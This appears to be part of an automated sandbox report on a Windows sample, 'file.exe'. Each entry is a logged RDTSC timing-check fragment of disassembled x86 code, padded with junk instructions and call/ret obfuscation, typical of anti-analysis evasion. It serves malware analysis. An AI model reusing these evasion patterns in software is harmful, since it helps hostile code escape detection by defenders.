Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28867A second address: 2886E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3D51D6D4h 0x00000010 pushad 0x00000011 jmp 00007FA93D08FA26h 0x00000016 sub dword ptr [ebp+122D35E7h], edx 0x0000001c popad 0x0000001d lea ebx, dword ptr [ebp+12453497h] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FA93D08FA18h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000015h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov dh, bl 0x0000003f xchg eax, ebx 0x00000040 jng 00007FA93D08FA22h 0x00000046 jo 00007FA93D08FA1Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2887AA second address: 2887BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2887BA second address: 2887BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27F8A2 second address: 27F8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7938 second address: 2A793C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A793C second address: 2A7940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7940 second address: 2A7985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA93D08FA27h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA93D08FA27h 0x00000012 jl 00007FA93D08FA1Ch 0x00000018 je 00007FA93D08FA16h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7C9E second address: 2A7CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA93CFE6D56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7CA9 second address: 2A7CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7DF8 second address: 2A7E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D67h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7E19 second address: 2A7E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7F7D second address: 2A7F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A872E second address: 2A8762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA21h 0x00000007 jg 00007FA93D08FA16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push esi 0x00000013 pop esi 0x00000014 jns 00007FA93D08FA16h 0x0000001a jbe 00007FA93D08FA16h 0x00000020 popad 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8762 second address: 2A8775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D5Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8775 second address: 2A877B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A877B second address: 2A8794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA93CFE6D64h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8794 second address: 2A879A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29E94A second address: 29E951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27DDB8 second address: 27DDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27DDBC second address: 27DDF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FA93CFE6D67h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27DDF6 second address: 27DE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007FA93D08FA16h 0x0000000c popad 0x0000000d jmp 00007FA93D08FA1Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A88D8 second address: 2A88E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A88E0 second address: 2A88E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A88E6 second address: 2A88EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A88EB second address: 2A8917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FA93D08FA23h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 272121 second address: 272125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 272125 second address: 272136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 272136 second address: 27213C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27213C second address: 272140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 272140 second address: 272159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FA93CFE6D56h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27C371 second address: 27C37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B5ED5 second address: 2B5EE9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA93CFE6D62h 0x0000000c jng 00007FA93CFE6D56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B6041 second address: 2B605B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA25h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B605B second address: 2B6060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B64C2 second address: 2B64CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B64CB second address: 2B64D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B8D97 second address: 2B8E1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FA93D08FA25h 0x0000000c pop edx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jns 00007FA93D08FA18h 0x00000019 pushad 0x0000001a jmp 00007FA93D08FA29h 0x0000001f jmp 00007FA93D08FA1Fh 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 jmp 00007FA93D08FA1Dh 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push ebx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a mov edi, 0E4A79C1h 0x0000003f push 3313B808h 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jg 00007FA93D08FA16h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B988A second address: 2B9890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B9B75 second address: 2B9B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FA93D08FA16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B9B93 second address: 2B9B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B9B97 second address: 2B9B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B9C92 second address: 2B9C9C instructions: 0x00000000 rdtsc 0x00000002 je 00007FA93CFE6D5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B9DDE second address: 2B9DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B9DE2 second address: 2B9E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FA93CFE6D5Eh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FA93CFE6D58h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007FA93CFE6D60h 0x0000002d jmp 00007FA93CFE6D68h 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 pushad 0x00000035 jmp 00007FA93CFE6D63h 0x0000003a jmp 00007FA93CFE6D65h 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FA93CFE6D5Eh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BA4F7 second address: 2BA4FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BAD99 second address: 2BAD9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BAD9F second address: 2BADA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BADA3 second address: 2BADA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BB6AC second address: 2BB6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BB6B2 second address: 2BB6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BD60A second address: 2BD610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BD610 second address: 2BD66C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, 0E7B9B59h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FA93CFE6D58h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a call 00007FA93CFE6D68h 0x0000002f mov si, ax 0x00000032 pop esi 0x00000033 push 00000000h 0x00000035 and edi, 2D992A24h 0x0000003b xchg eax, ebx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BD66C second address: 2BD670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BE15F second address: 2BE165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BE165 second address: 2BE169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BD3B0 second address: 2BD3B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BD3B6 second address: 2BD3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BECF6 second address: 2BECFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BF8CE second address: 2BF8D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA93D08FA16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BF645 second address: 2BF64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0103 second address: 2C0107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0107 second address: 2C010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C214E second address: 2C2153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C010B second address: 2C0115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C2153 second address: 2C2163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0115 second address: 2C0119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C2163 second address: 2C2167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C2167 second address: 2C216D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C372B second address: 2C3739 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C3739 second address: 2C373D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C2953 second address: 2C2957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C373D second address: 2C3743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C39C4 second address: 2C39D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C39D2 second address: 2C39D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C39D6 second address: 2C39E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C5862 second address: 2C5875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D5Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C39E6 second address: 2C39EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C5875 second address: 2C587B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68C4 second address: 2C68C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68C8 second address: 2C68CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C59B6 second address: 2C59D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FA93D08FA16h 0x0000000b jo 00007FA93D08FA16h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FA93D08FA18h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68CE second address: 2C68DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93CFE6D5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C78C4 second address: 2C78D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA93D08FA1Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C888B second address: 2C88F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FA93CFE6D69h 0x0000000f push 00000000h 0x00000011 js 00007FA93CFE6D7Ch 0x00000017 call 00007FA93CFE6D62h 0x0000001c jmp 00007FA93CFE6D63h 0x00000021 pop ebx 0x00000022 push 00000000h 0x00000024 mov di, 953Dh 0x00000028 xchg eax, esi 0x00000029 jnp 00007FA93CFE6D5Ah 0x0000002f push edx 0x00000030 push edx 0x00000031 pop edx 0x00000032 pop edx 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 push esi 0x00000038 pop esi 0x00000039 pop ebx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C7ACD second address: 2C7B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA93D08FA1Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov di, si 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FA93D08FA18h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push esi 0x00000035 jmp 00007FA93D08FA28h 0x0000003a pop ebx 0x0000003b jmp 00007FA93D08FA20h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov dword ptr [ebp+1245830Fh], ecx 0x0000004d mov edi, eax 0x0000004f mov eax, dword ptr [ebp+122D01D1h] 0x00000055 stc 0x00000056 push FFFFFFFFh 0x00000058 jl 00007FA93D08FA1Ah 0x0000005e mov di, 2005h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FA93D08FA20h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C992A second address: 2C9992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D5Eh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FA93CFE6D58h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2D8Fh], esi 0x0000002d push 00000000h 0x0000002f mov bx, F375h 0x00000033 push 00000000h 0x00000035 sub dword ptr [ebp+122D2FA4h], eax 0x0000003b xchg eax, esi 0x0000003c push esi 0x0000003d jmp 00007FA93CFE6D5Dh 0x00000042 pop esi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FA93CFE6D5Eh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C9992 second address: 2C99A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA1Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C99A5 second address: 2C99A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
